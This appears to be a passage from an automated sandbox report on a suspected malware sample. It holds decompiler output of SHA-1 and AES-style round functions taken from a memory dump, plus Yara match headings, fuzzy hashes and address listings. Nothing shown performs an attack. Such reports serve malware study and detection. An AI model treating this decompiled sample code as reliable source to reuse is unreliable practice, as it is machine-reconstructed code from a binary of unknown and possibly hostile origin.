                                                                                                                                                    					_t323 = _v12;
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_v16 = _t404;
                                                                                                                                                    					_v12 = _t488;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v8 = _t358;
                                                                                                                                                    					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t491 = _t279;
                                                                                                                                                    					asm("ror ebx, 0x2");
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t362 = _v12;
                                                                                                                                                    					_v8 = _t323;
                                                                                                                                                    					_t325 = _v8;
                                                                                                                                                    					_v12 = _t410;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t413 = _v12;
                                                                                                                                                    					_v16 = _t491;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v8 = _t362;
                                                                                                                                                    					_v12 = _t285;
                                                                                                                                                    					asm("rol eax, 0x5");
                                                                                                                                                    					_v16 = _t325;
                                                                                                                                                    					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t358 = _v12;
                                                                                                                                                    					_t288 = _v8;
                                                                                                                                                    					asm("ror edx, 0x2");
                                                                                                                                                    					_v8 = _t413;
                                                                                                                                                    					_v12 = _t496;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v16 = _t288;
                                                                                                                                                    					_t279 = _v12;
                                                                                                                                                    					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t404 = _v8;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_t463 = _t462 + 5;
                                                                                                                                                    					_t320 = _t499;
                                                                                                                                                    					_v12 = _t320;
                                                                                                                                                    					_v8 = _t463;
                                                                                                                                                    				} while (_t463 < 0x14);
                                                                                                                                                    				_t464 = 0x14;
                                                                                                                                                    				// SHA-1 rounds 20-39: f = b ^ c ^ d, K = 0x6ed9eba1, unrolled five rounds per pass
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_v16 = _t404;
                                                                                                                                                    					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                                                                                                    					_t334 = _v12;
                                                                                                                                                    					_v12 = _t502;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                                                                                                    					asm("ror ebx, 0x2");
                                                                                                                                                    					_t505 = _t279;
                                                                                                                                                    					_v16 = _t358;
                                                                                                                                                    					_t365 = _v12;
                                                                                                                                                    					_v12 = _t420;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                                                                                                    					_t423 = _v12;
                                                                                                                                                    					_v8 = _t334;
                                                                                                                                                    					_v8 = _t365;
                                                                                                                                                    					_v12 = _t292;
                                                                                                                                                    					asm("rol eax, 0x5");
                                                                                                                                                    					_t464 = _t464 + 5;
                                                                                                                                                    					_t358 = _v12;
                                                                                                                                                    					asm("ror edx, 0x2");
                                                                                                                                                    					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                                                                                                                                    					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                                                                                                                                    					_t295 = _v8;
                                                                                                                                                    					_v8 = _t423;
                                                                                                                                                    					_v12 = _t506;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t404 = _v8;
                                                                                                                                                    					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                                                                                                                                    					_v16 = _t295;
                                                                                                                                                    					_t279 = _v12;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v12 = _t499;
                                                                                                                                                    				} while (_t464 < 0x28);
                                                                                                                                                    				_v8 = 0x28;
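                                                                                                                                                    				// SHA-1 rounds 40-59: f = majority(b, c, d), K = 0x8f1bbcdc (rendered by the decompiler as "- 0x70e44324")
                                                                                                                                                    				do {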
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v16 = _t404;
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                                                                                                                                    					_t470 = _v12;
                                                                                                                                                    					_v12 = _t510;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t340 = _v8;
                                                                                                                                                    					asm("ror edi, 0x2");
                                                                                                                                                    					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                                                                                                                                    					_v16 = _t358;
                                                                                                                                                    					_t369 = _v12;
                                                                                                                                                    					_v12 = _t432;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					_v8 = _t279;
                                                                                                                                                    					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t299 = _v12;
                                                                                                                                                    					_v8 = _t470;
                                                                                                                                                    					_v12 = _t434;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t437 = _t369;
                                                                                                                                                    					_t358 = _v12;
                                                                                                                                                    					_v8 = _t437;
                                                                                                                                                    					_v12 = _t522;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                                                                                                                                    					_t404 = _t299;
                                                                                                                                                    					_t279 = _v12;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v12 = _t499;
                                                                                                                                                    					_t341 = _t340 + 5;
                                                                                                                                                    					_v8 = _t341;
                                                                                                                                                    				} while (_t341 < 0x3c);
                                                                                                                                                    				_t478 = 0x3c;
                                                                                                                                                    				_v8 = 0x3c;
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t479 = _v8;
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_t346 = _v12;
                                                                                                                                                    					_v16 = _t404;
                                                                                                                                                    					_v12 = _t525;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					asm("ror ebx, 0x2");
                                                                                                                                                    					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_v16 = _t358;
                                                                                                                                                    					_t370 = _v12;
                                                                                                                                                    					_v12 = _t445;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					_v16 = _t279;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_t404 = _v12;
                                                                                                                                                    					_v12 = _t303;
                                                                                                                                                    					asm("rol eax, 0x5");
                                                                                                                                                    					_v16 = _t346;
                                                                                                                                                    					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_t305 = _t370;
                                                                                                                                                    					_v8 = _t346;
                                                                                                                                                    					asm("ror edx, 0x2");
                                                                                                                                                    					_v8 = _t370;
                                                                                                                                                    					_t358 = _v12;
                                                                                                                                                    					_v12 = _t532;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t478 = _t479 + 5;
                                                                                                                                                    					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_v16 = _t305;
                                                                                                                                                    					_t279 = _v12;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v8 = _t404;
                                                                                                                                                    					_v12 = _t499;
                                                                                                                                                    					_v8 = _t478;
                                                                                                                                                    				} while (_t478 < 0x50);
                                                                                                                                                    				_t480 = _a4;
                                                                                                                                                    				_t480[2] = _t480[2] + _t358;
                                                                                                                                                    				_t480[3] = _t480[3] + _t404;
                                                                                                                                                    				_t311 = _t480[4] + _v16;
                                                                                                                                                    				 *_t480 =  *_t480 + _t499;
                                                                                                                                                    				_t480[1] = _t480[1] + _t279;
                                                                                                                                                    				_t480[4] = _t311;
                                                                                                                                                    				_t480[0x17] = 0;
                                                                                                                                                    				return _t311;
                                                                                                                                                    			}
                                                                                                                                                    0x0040904a
                                                                                                                                                    0x0040904d
                                                                                                                                                    0x00409060
                                                                                                                                                    0x00409066
                                                                                                                                                    0x00409069
                                                                                                                                                    0x00409070
                                                                                                                                                    0x00409072
                                                                                                                                                    0x00409075
                                                                                                                                                    0x00409078
                                                                                                                                                    0x0040907b
                                                                                                                                                    0x0040907e
                                                                                                                                                    0x00409081
                                                                                                                                                    0x0040908a
                                                                                                                                                    0x0040908f
                                                                                                                                                    0x00409092
                                                                                                                                                    0x00409092
                                                                                                                                                    0x004090a5
                                                                                                                                                    0x004090a8
                                                                                                                                                    0x004090ab
                                                                                                                                                    0x004090b2
                                                                                                                                                    0x004090b5
                                                                                                                                                    0x004090b8
                                                                                                                                                    0x004090bb
                                                                                                                                                    0x004090ce
                                                                                                                                                    0x004090d1
                                                                                                                                                    0x004090dc
                                                                                                                                                    0x004090df
                                                                                                                                                    0x004090eb
                                                                                                                                                    0x004090ee
                                                                                                                                                    0x004090f4
                                                                                                                                                    0x004090f7
                                                                                                                                                    0x004090fa
                                                                                                                                                    0x00409101
                                                                                                                                                    0x00409111
                                                                                                                                                    0x00409114
                                                                                                                                                    0x0040911a
                                                                                                                                                    0x0040911d
                                                                                                                                                    0x00409124
                                                                                                                                                    0x00409126
                                                                                                                                                    0x00409129
                                                                                                                                                    0x0040912c
                                                                                                                                                    0x0040912f
                                                                                                                                                    0x00409132
                                                                                                                                                    0x00409139
                                                                                                                                                    0x00409148
                                                                                                                                                    0x0040914b
                                                                                                                                                    0x00409152
                                                                                                                                                    0x00409155
                                                                                                                                                    0x00409158
                                                                                                                                                    0x0040915b
                                                                                                                                                    0x0040915e
                                                                                                                                                    0x00409161
                                                                                                                                                    0x00409164
                                                                                                                                                    0x0040916d
                                                                                                                                                    0x0040917e
                                                                                                                                                    0x00409186
                                                                                                                                                    0x0040918c
                                                                                                                                                    0x0040918f
                                                                                                                                                    0x00409191
                                                                                                                                                    0x00409194
                                                                                                                                                    0x00409197
                                                                                                                                                    0x004091a4

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 0-3887548279
                                                                                                                                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                    • Instruction ID: d8c2fb7df0c5b58699e1db2dcf7a8d999a68655801dbc0658ec4d80d3c45db5f
                                                                                                                                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                    • Instruction Fuzzy Hash: 19021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                    • Opcode ID: deda2730c106b793deb6022644ab5eed42578513340d44c4212a2fe3a1956b73
                                                                                                                                                    • Instruction ID: 6e7387e5cf6fdbc6b24366b7bffe2aa636266aa67acae74c49106df88dce7376
                                                                                                                                                    • Opcode Fuzzy Hash: deda2730c106b793deb6022644ab5eed42578513340d44c4212a2fe3a1956b73
                                                                                                                                                    • Instruction Fuzzy Hash: 60A1F371A4424E7ADF24CF60CC51BFE77A5EB0A308F0440ADF956DA1C1CA798E94EB20
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: [Pj
                                                                                                                                                    • API String ID: 0-2289356113
                                                                                                                                                    • Opcode ID: 2d835cd30ceb7cb201cad1b928f4082cc9a497507120315e9fecf03e31d0ff54
                                                                                                                                                    • Instruction ID: efb8bd9c77c9d7aaca5d1aaad2a6f1c6877865d71d12436f66c44de0281c2c5b
                                                                                                                                                    • Opcode Fuzzy Hash: 2d835cd30ceb7cb201cad1b928f4082cc9a497507120315e9fecf03e31d0ff54
                                                                                                                                                    • Instruction Fuzzy Hash: 56F0F6352043447BE7119B10CC85F2A7BA5FF82705F208418FC459E0D3C772C895E725
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a1f7938c2d5ddf855c504859c23fdb37d9bddb76a49a89d4610d6cf5dc2c5494
                                                                                                                                                    • Instruction ID: 95e0962ccb50df6bf3a15aa862c922b10b878080164970de8bceb74465aba7f9
                                                                                                                                                    • Opcode Fuzzy Hash: a1f7938c2d5ddf855c504859c23fdb37d9bddb76a49a89d4610d6cf5dc2c5494
                                                                                                                                                    • Instruction Fuzzy Hash: 7702B833D497B78B47714EFE40E052A7AA09E0169031FC7E9DCE83F296C116DE0996E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fbb72c29a3ef3608112ba24ccd22580ea3a8ac5ce98db8869db191b12f10e6ad
                                                                                                                                                    • Instruction ID: 6b4460f8a276b4e58ba1a82632c1bf510d65c5b77ef1d18f111db796e9250510
                                                                                                                                                    • Opcode Fuzzy Hash: fbb72c29a3ef3608112ba24ccd22580ea3a8ac5ce98db8869db191b12f10e6ad
                                                                                                                                                    • Instruction Fuzzy Hash: 20029D7190012AABCF349F59C8887F9B3B5EF18704F5440EAE999A7190E7358FD1EB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 26%
                                                                                                                                                    			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				void* _t273;
                                                                                                                                                    				signed int _t274;
                                                                                                                                                    				signed int _t282;
                                                                                                                                                    				signed int* _t358;
                                                                                                                                                    				signed int _t383;
                                                                                                                                                    				signed int* _t409;
                                                                                                                                                    				signed int _t429;
                                                                                                                                                    				signed int _t458;
                                                                                                                                                    				signed int _t478;
                                                                                                                                                    				signed int _t560;
                                                                                                                                                    				signed int _t603;
                                                                                                                                                    
                                                                                                                                                    				_t273 = __eax;
                                                                                                                                                    				asm("ror edi, 0x8");
                                                                                                                                                    				asm("rol edx, 0x8");
                                                                                                                                                    				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edx, 0x8");
                                                                                                                                                    				_v20 = _t458;
                                                                                                                                                    				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edx, 0x8");
                                                                                                                                                    				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol edx, 0x8");
                                                                                                                                                    				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                                                                                                                                    				asm("ror edx, 0x10");
                                                                                                                                                    				asm("ror esi, 0x8");
                                                                                                                                                    				asm("rol esi, 0x8");
                                                                                                                                                    				_v24 = _t282;
                                                                                                                                                    				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                                                                                                                                    				asm("ror esi, 0x10");
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol ebx, 0x8");
                                                                                                                                                    				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("ror edi, 0x10");
                                                                                                                                                    				asm("rol edi, 0x8");
                                                                                                                                                    				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                                                                                                                                    				asm("ror edi, 0x10");
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol ebx, 0x8");
                                                                                                                                                    				_t409 =  &(__ecx[8]);
                                                                                                                                                    				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                                                                                                                    				_t478 = (_a4 >> 1) - 1;
                                                                                                                                                    				_a4 = _t478;
                                                                                                                                                    				if(_t478 != 0) {
                                                                                                                                                    					do {
                                                                                                                                                    						asm("ror edi, 0x10");
                                                                                                                                                    						asm("ror ebx, 0x8");
                                                                                                                                                    						asm("rol ebx, 0x8");
                                                                                                                                                    						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                                                                                                                                                    						asm("ror edi, 0x10");
                                                                                                                                                    						asm("ror ebx, 0x8");
                                                                                                                                                    						asm("rol ebx, 0x8");
                                                                                                                                                    						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                                                                                                                                                    						asm("ror ebx, 0x8");
                                                                                                                                                    						asm("ror edi, 0x10");
                                                                                                                                                    						asm("rol edi, 0x8");
                                                                                                                                                    						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                                                                                                                                                    						asm("ror edi, 0x10");
                                                                                                                                                    						asm("ror edx, 0x8");
                                                                                                                                                    						asm("rol edx, 0x8");
                                                                                                                                                    						_v24 = _t383;
                                                                                                                                                    						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                                                                                                                                                    						asm("ror edx, 0x10");
                                                                                                                                                    						asm("ror esi, 0x8");
                                                                                                                                                    						asm("rol esi, 0x8");
                                                                                                                                                    						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                                                                                                                                                    						asm("ror esi, 0x10");
                                                                                                                                                    						asm("ror ebx, 0x8");
                                                                                                                                                    						asm("rol ebx, 0x8");
                                                                                                                                                    						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                                                                                                                                                    						_v12 = _t560;
                                                                                                                                                    						asm("ror edi, 0x8");
                                                                                                                                                    						asm("ror ebx, 0x10");
                                                                                                                                                    						asm("rol ebx, 0x8");
                                                                                                                                                    						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                                                                                                                                                    						asm("ror ebx, 0x10");
                                                                                                                                                    						asm("ror edi, 0x8");
                                                                                                                                                    						asm("rol edi, 0x8");
                                                                                                                                                    						_t409 =  &(_t409[8]);
                                                                                                                                                    						_t205 =  &_a4;
                                                                                                                                                    						 *_t205 = _a4 - 1;
                                                                                                                                                    						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                                                                                                                    					} while ( *_t205 != 0);
                                                                                                                                                    				}
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edi, 0x8");
                                                                                                                                                    				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edi, 0x8");
                                                                                                                                                    				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edi, 0x8");
                                                                                                                                                    				_t358 = _a8;
                                                                                                                                                    				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                                                                                                                                                    				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                                                                                                                                    				asm("ror ecx, 0x8");
                                                                                                                                                    				asm("rol edi, 0x8");
